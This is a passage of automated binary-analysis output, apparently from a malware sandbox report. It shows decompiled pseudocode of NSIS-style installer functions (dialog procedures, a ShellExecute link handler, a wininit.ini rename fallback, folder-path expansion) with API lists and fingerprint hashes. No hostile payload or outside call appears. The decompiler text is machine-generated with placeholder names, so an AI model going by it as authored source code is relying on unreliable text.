            						DestroyWindow( *0x7a2758);
            						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
            						__eflags =  *0x7a2f84;
            						EndDialog(_t117,  *0x79e950);
            						goto L58;
            					} else {
            						__eflags = _t33 - 1;
            						if(_t33 != 1) {
            							L37:
            							__eflags =  *_t132;
            							if( *_t132 == 0) {
            								goto L61;
            							}
            							goto L38;
            						}
            						_push(0);
            						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
            						__eflags = _t84;
            						if(_t84 == 0) {
            							goto L37;
            						}
            						SendMessageA( *0x7a2758, 0x40f, 0, 1);
            						__eflags =  *0x7a274c;
            						return 0 |  *0x7a274c == 0x00000000;
            					}
            				} else {
            					_t117 = _a4;
            					if(_t135 == 0x47) {
            						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
            					}
            					if(_t135 == 5) {
            						asm("sbb eax, eax");
            						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
            					}
            					if(_t135 != 0x40d) {
            						__eflags = _t135 - 0x11;
            						if(_t135 != 0x11) {
            							__eflags = _t135 - 0x10;
            							if(_t135 != 0x10) {
            								L14:
            								__eflags = _t135 - 0x111;
            								if(_t135 != 0x111) {
            									L30:
            									return E00403E0E(_t135, _a12, _a16);
            								}
            								_t134 = _a12 & 0x0000ffff;
            								_t127 = GetDlgItem(_t117, _t134);
            								__eflags = _t127;
            								if(_t127 == 0) {
            									L17:
            									__eflags = _t134 - 1;
            									if(_t134 != 1) {
            										__eflags = _t134 - 3;
            										if(_t134 != 3) {
            											__eflags = _t134 - 2;
            											if(_t134 != 2) {
            												L29:
            												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
            												goto L30;
            											}
            											__eflags =  *0x7a300c;
            											if( *0x7a300c == 0) {
            												_t97 = E00401410(3);
            												__eflags = _t97;
            												if(_t97 != 0) {
            													goto L30;
            												}
            												 *0x79e950 = 1;
            												L25:
            												_push(0x78);
            												L26:
            												E00403D80();
            												goto L30;
            											}
            											E00401410(_t134);
            											 *0x79e950 = _t134;
            											goto L25;
            										}
            										__eflags =  *0x409284;
            										if( *0x409284 <= 0) {
            											goto L29;
            										}
            										_push(0xffffffff);
            										goto L26;
            									}
            									_push(1);
            									goto L26;
            								}
            								SendMessageA(_t127, 0xf3, 0, 0);
            								_t101 = IsWindowEnabled(_t127);
            								__eflags = _t101;
            								if(_t101 == 0) {
            									goto L61;
            								}
            								goto L17;
            							}
            							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
            							if(__eflags != 0) {
            								goto L30;
            							}
            							_t104 = IsWindowEnabled( *0x79e548);
            							__eflags = _t104;
            							if(_t104 != 0) {
            								goto L30;
            							}
            							_t135 = 0x111;
            							_a12 = 1;
            							goto L14;
            						}
            						SetWindowLongA(_t117, 0, 0);
            						return 1;
            					} else {
            						DestroyWindow( *0x7a2758);
            						 *0x7a2758 = _a12;
            						L58:
            						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
            							ShowWindow(_t117, 0xa);
            							 *0x7a0580 = 1;
            						}
            						L61:
            						return 0;
            					}
            				}
            			}

            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
            • ShowWindow.USER32(?), ref: 00403918
            • DestroyWindow.USER32 ref: 0040392C
            • SetWindowLongA.USER32 ref: 0040394A
            • IsWindowEnabled.USER32 ref: 00403975
            • GetDlgItem.USER32 ref: 004039A3
            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
            • IsWindowEnabled.USER32(00000000), ref: 004039C2
            • GetDlgItem.USER32 ref: 00403A6A
            • GetDlgItem.USER32 ref: 00403A74
            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
            • GetDlgItem.USER32 ref: 00403B86
            • ShowWindow.USER32(00000000,?), ref: 00403BA6
            • EnableWindow.USER32(00000000,?), ref: 00403BB5
            • EnableWindow.USER32(?,?), ref: 00403BD0
            • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
            • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
            • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
            • ShowWindow.USER32(?,0000000A), ref: 00403D64
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
            • String ID:
            • API String ID: 3950083612-0
            • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
            • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
            				char* _v8;
            				signed int _v12;
            				void* _v16;
            				struct HWND__* _t52;
            				long _t86;
            				int _t98;
            				struct HWND__* _t99;
            				signed int _t100;
            				intOrPtr _t109;
            				int _t110;
            				signed int* _t112;
            				signed int _t113;
            				char* _t114;
            				CHAR* _t115;
            
            				if(_a8 != 0x110) {
            					if(_a8 != 0x111) {
            						L11:
            						if(_a8 != 0x4e) {
            							if(_a8 == 0x40b) {
            								 *0x79f568 =  *0x79f568 + 1;
            							}
            							L25:
            							_t110 = _a16;
            							L26:
            							return E00403E0E(_a8, _a12, _t110);
            						}
            						_t52 = GetDlgItem(_a4, 0x3e8);
            						_t110 = _a16;
            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
            							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
            							_t109 =  *((intOrPtr*)(_t110 + 0x18));
            							_v12 = _t100;
            							_v16 = _t109;
            							_v8 = 0x7a1f20;
            							if(_t100 - _t109 < 0x800) {
            								SendMessageA(_t52, 0x44b, 0,  &_v16);
            								SetCursor(LoadCursorA(0, 0x7f02));
            								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
            								SetCursor(LoadCursorA(0, 0x7f00));
            								_t110 = _a16;
            							}
            						}
            						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
            							goto L26;
            						} else {
            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
            								SendMessageA( *0x7a2f84, 0x111, 1, 0);
            							}
            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
            								SendMessageA( *0x7a2f84, 0x10, 0, 0);
            							}
            							return 1;
            						}
            					}
            					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
            						goto L25;
            					} else {
            						_t112 =  *0x79ed58 + 0x14;
            						if(( *_t112 & 0x00000020) == 0) {
            							goto L25;
            						}
            						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
            						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
            						E0040417A();
            						goto L11;
            					}
            				}
            				_t98 = _a16;
            				_t113 =  *(_t98 + 0x30);
            				if(_t113 < 0) {
            					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
            				}
            				_push( *((intOrPtr*)(_t98 + 0x34)));
            				_t114 = _t113 +  *0x7a2fb8;
            				_push(0x22);
            				_a16 =  *_t114;
            				_v12 = _v12 & 0x00000000;
            				_t115 = _t114 + 1;
            				_v16 = _t115;
            				_v8 = E00403EBB;
            				E00403DA7(_a4);
            				_push( *((intOrPtr*)(_t98 + 0x38)));
            				_push(0x23);
            				E00403DA7(_a4);
            				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
            				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
            				_t99 = GetDlgItem(_a4, 0x3e8);
            				E00403DDC(_t99);
            				SendMessageA(_t99, 0x45b, 1, 0);
            				_t86 =  *( *0x7a2f88 + 0x68);
            				if(_t86 < 0) {
            					_t86 = GetSysColor( ~_t86);
            				}
            				SendMessageA(_t99, 0x443, 0, _t86);
            				SendMessageA(_t99, 0x445, 0, 0x4010000);
            				 *0x79e54c =  *0x79e54c & 0x00000000;
            				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
            				SendMessageA(_t99, 0x449, _a16,  &_v16);
            				 *0x79f568 =  *0x79f568 & 0x00000000;
            				return 0;
            			}

            APIs
            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
            • GetDlgItem.USER32 ref: 00403F8E
            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
            • GetSysColor.USER32(?), ref: 00403FBD
            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
            • lstrlenA.KERNEL32(?), ref: 00403FE5
            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
            • GetDlgItem.USER32 ref: 00404065
            • SendMessageA.USER32(00000000), ref: 00404068
            • GetDlgItem.USER32 ref: 00404093
            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
            • LoadCursorA.USER32 ref: 004040E2
            • SetCursor.USER32(00000000), ref: 004040EB
            • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
            • LoadCursorA.USER32 ref: 0040410B
            • SetCursor.USER32(00000000), ref: 0040410E
            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
            • String ID: N$open
            • API String ID: 3615053054-904208323
            • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
            • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E00405707(long _a4, long _a16) {
            				CHAR* _v0;
            				intOrPtr* _t13;
            				long _t14;
            				int _t19;
            				void* _t27;
            				long _t28;
            				intOrPtr* _t36;
            				int _t42;
            				intOrPtr* _t43;
            				long _t48;
            				CHAR* _t50;
            				void* _t52;
            				void* _t54;
            
            				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
            				_t50 = _v0;
            				if(_t13 != 0) {
            					_t19 =  *_t13(_a4, _t50, 5);
            					if(_t19 != 0) {
            						L16:
            						 *0x7a3010 =  *0x7a3010 + 1;
            						return _t19;
            					}
            				}
            				 *0x7a1710 = 0x4c554e;
            				if(_t50 == 0) {
            					L5:
            					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
            					if(_t14 != 0 && _t14 <= 0x400) {
            						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
            						GetWindowsDirectoryA(0x7a1188, 0x3f0);
            						lstrcatA(0x7a1188, "\\wininit.ini");
            						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
            						_t54 = _t19;
            						if(_t54 == 0xffffffff) {
            							goto L16;
            						}
            						_t48 = GetFileSize(_t54, 0);
            						_t5 = _t42 + 0xa; // 0xa
            						_t52 = GlobalAlloc(0x40, _t48 + _t5);
            						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
            							L15:
            							_t19 = CloseHandle(_t54);
            							goto L16;
            						} else {
            							if(E00405624(_t52, "[Rename]\r\n") != 0) {
            								_t27 = E00405624(_t25 + 0xa, "\n[");
            								if(_t27 == 0) {
            									L13:
            									_t28 = _t48;
            									L14:
            									E00405670(_t52 + _t28, 0x7a0d88, _t42);
            									SetFilePointer(_t54, 0, 0, 0);
            									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
            									GlobalFree(_t52);
            									goto L15;
            								}
            								_t36 = _t27 + 1;
            								_t43 = _t36;
            								if(_t36 >= _t52 + _t48) {
            									L21:
            									_t28 = _t36 - _t52;
            									goto L14;
            								} else {
            									goto L20;
            								}
            								do {
            									L20:
            									 *((char*)(_t43 + _t42)) =  *_t43;
            									_t43 = _t43 + 1;
            								} while (_t43 < _t52 + _t48);
            								goto L21;
            							}
            							E004059BF(_t52 + _t48, "[Rename]\r\n");
            							_t48 = _t48 + 0xa;
            							goto L13;
            						}
            					}
            				} else {
            					CloseHandle(E00405690(_t50, 0, 1));
            					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
            					if(_t14 != 0 && _t14 <= 0x400) {
            						goto L5;
            					}
            				}
            				return _t14;
            			}

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
            • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
            • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
            • wsprintfA.USER32 ref: 004057A0
            • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
            • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
            • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
            • GlobalFree.KERNEL32 ref: 0040586C
            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
            • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
            • API String ID: 3633819597-1342836890
            • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
            • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 90%
            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
            				struct tagLOGBRUSH _v16;
            				struct tagRECT _v32;
            				struct tagPAINTSTRUCT _v96;
            				struct HDC__* _t70;
            				struct HBRUSH__* _t87;
            				struct HFONT__* _t94;
            				long _t102;
            				signed int _t126;
            				struct HDC__* _t128;
            				intOrPtr _t130;
            
            				if(_a8 == 0xf) {
            					_t130 =  *0x7a2f88;
            					_t70 = BeginPaint(_a4,  &_v96);
            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
            					_a8 = _t70;
            					GetClientRect(_a4,  &_v32);
            					_t126 = _v32.bottom;
            					_v32.bottom = _v32.bottom & 0x00000000;
            					while(_v32.top < _t126) {
            						_a12 = _t126 - _v32.top;
            						asm("cdq");
            						asm("cdq");
            						asm("cdq");
            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
            						_t87 = CreateBrushIndirect( &_v16);
            						_v32.bottom = _v32.bottom + 4;
            						_a16 = _t87;
            						FillRect(_a8,  &_v32, _t87);
            						DeleteObject(_a16);
            						_v32.top = _v32.top + 4;
            					}
            					if( *(_t130 + 0x58) != 0xffffffff) {
            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
            						_a16 = _t94;
            						if(_t94 != 0) {
            							_t128 = _a8;
            							_v32.left = 0x10;
            							_v32.top = 8;
            							SetBkMode(_t128, 1);
            							SetTextColor(_t128,  *(_t130 + 0x58));
            							_a8 = SelectObject(_t128, _a16);
            							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
            							SelectObject(_t128, _a8);
            							DeleteObject(_a16);
            						}
            					}
            					EndPaint(_a4,  &_v96);
            					return 0;
            				}
            				_t102 = _a16;
            				if(_a8 == 0x46) {
            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
            					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
            				}
            				return DefWindowProcA(_a4, _a8, _a12, _t102);
            			}
            Instruction addresses for the statements above, in listing order (0x00000000 where the tool assigned none): 0x0040100a, 0x00401039, 0x00401047, 0x0040104d, 0x00401051, 0x0040105b, 0x00401061, 0x00401064, 0x004010f3, 0x00401089, 0x0040108c, 0x004010a6, 0x004010bd, 0x004010cc, 0x004010cf, 0x004010d5, 0x004010d9, 0x004010e4, 0x004010ed, 0x004010ef, 0x004010ef, 0x00401100, 0x00401105, 0x0040110d, 0x00401110, 0x00401112, 0x00401118, 0x0040111f, 0x00401126, 0x00401130, 0x00401142, 0x00401156, 0x00401160, 0x00401165, 0x00401165, 0x00401110, 0x0040116e, 0x00000000, 0x00401178, 0x00401010, 0x00401013, 0x00401015, 0x0040101f, 0x0040101f, 0x00000000

            APIs
            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32 ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32 ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectA.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
            • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
            				struct _ITEMIDLIST* _v8;
            				char _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				CHAR* _t35;
            				signed int _t37;
            				signed int _t38;
            				signed int _t49;
            				char _t51;
            				signed int _t61;
            				char* _t62;
            				char _t67;
            				signed int _t69;
            				CHAR* _t79;
            				signed int _t86;
            				signed int _t88;
            				void* _t89;
            
            				_t61 = _a8;
            				if(_t61 < 0) {
            					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
            				}
            				_t62 = _t61 +  *0x7a2fb8;
            				_t35 = 0x7a1f20;
            				_t79 = 0x7a1f20;
            				if(_a4 - 0x7a1f20 < 0x800) {
            					_t79 = _a4;
            					_a4 = _a4 & 0x00000000;
            				}
            				while(1) {
            					_t67 =  *_t62;
            					_a11 = _t67;
            					if(_t67 == 0) {
            						break;
            					}
            					__eflags = _t79 - _t35 - 0x400;
            					if(_t79 - _t35 >= 0x400) {
            						break;
            					}
            					_t62 = _t62 + 1;
            					__eflags = _t67 - 0xfc;
            					if(__eflags <= 0) {
            						if(__eflags != 0) {
            							 *_t79 = _t67;
            							_t79 =  &(_t79[1]);
            							__eflags = _t79;
            						} else {
            							 *_t79 =  *_t62;
            							_t79 =  &(_t79[1]);
            							_t62 = _t62 + 1;
            						}
            						continue;
            					}
            					_t37 =  *((char*)(_t62 + 1));
            					_t69 =  *_t62;
            					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
            					_v28 = _t69;
            					_v20 = _t37;
            					_t70 = _t69 | 0x00008000;
            					_t38 = _t37 | 0x00008000;
            					_v24 = _t69 | 0x00008000;
            					_t62 = _t62 + 2;
            					__eflags = _a11 - 0xfe;
            					_v16 = _t38;
            					if(_a11 != 0xfe) {
            						__eflags = _a11 - 0xfd;
            						if(_a11 != 0xfd) {
            							__eflags = _a11 - 0xff;
            							if(_a11 == 0xff) {
            								__eflags = (_t38 | 0xffffffff) - _t86;
            								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
            							}
            							L38:
            							_t79 =  &(_t79[lstrlenA(_t79)]);
            							_t35 = 0x7a1f20;
            							continue;
            						}
            						__eflags = _t86 - 0x1b;
            						if(_t86 != 0x1b) {
            							__eflags = (_t86 << 0xa) + 0x7a4000;
            							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
            						} else {
            							E0040591D(_t79,  *0x7a2f84);
            						}
            						__eflags = _t86 + 0xffffffeb - 6;
            						if(_t86 + 0xffffffeb < 6) {
            							L29:
            							E00405BFB(_t79);
            						}
            						goto L38;
            					}
            					_a8 = _a8 & 0x00000000;
            					 *_t79 =  *_t79 & 0x00000000;
            					_t88 = 4;
            					__eflags = _v20 - _t88;
            					if(_v20 != _t88) {
            						_t49 = _v28;
            						__eflags = _t49 - 0x2b;
            						if(_t49 != 0x2b) {
            							__eflags = _t49 - 0x26;
            							if(_t49 != 0x26) {
            								__eflags = _t49 - 0x25;
            								if(_t49 != 0x25) {
            									__eflags = _t49 - 0x24;
            									if(_t49 != 0x24) {
            										goto L19;
            									}
            									GetWindowsDirectoryA(_t79, 0x400);
            									goto L18;
            								}
            								GetSystemDirectoryA(_t79, 0x400);
            								goto L18;
            							}
            							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
            							__eflags =  *_t79;
            							if( *_t79 != 0) {
            								goto L29;
            							}
            							E004059BF(_t79, "C:\\Program Files");
            							goto L18;
            						} else {
            							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
            							L18:
            							__eflags =  *_t79;
            							if( *_t79 != 0) {
            								goto L29;
            							}
            							goto L19;
            						}
            					} else {
            						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
            						L19:
            						__eflags =  *0x7a3004;
            						if( *0x7a3004 == 0) {
            							_t88 = 2;
            						}
            						do {
            							_t88 = _t88 - 1;
            							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
            							__eflags = _t51;
            							if(_t51 != 0) {
            								 *_t79 =  *_t79 & 0x00000000;
            								__eflags =  *_t79;
            								goto L25;
            							}
            							__imp__SHGetPathFromIDListA(_v8, _t79);
            							_v12 = _t51;
            							E0040521C(_t70, _v8);
            							__eflags = _v12;
            							if(_v12 != 0) {
            								break;
            							}
            							L25:
            							__eflags = _t88;
            						} while (_t88 != 0);
            						__eflags =  *_t79;
            						if( *_t79 != 0) {
            							__eflags = _a8;
            							if(_a8 != 0) {
            								lstrcatA(_t79, _a8);
            							}
            						}
            						goto L29;
            					}
            				}
            				 *_t79 =  *_t79 & 0x00000000;
            				if(_a4 == 0) {
            					return _t35;
            				}
            				return E004059BF(_a4, _t35);
            			}
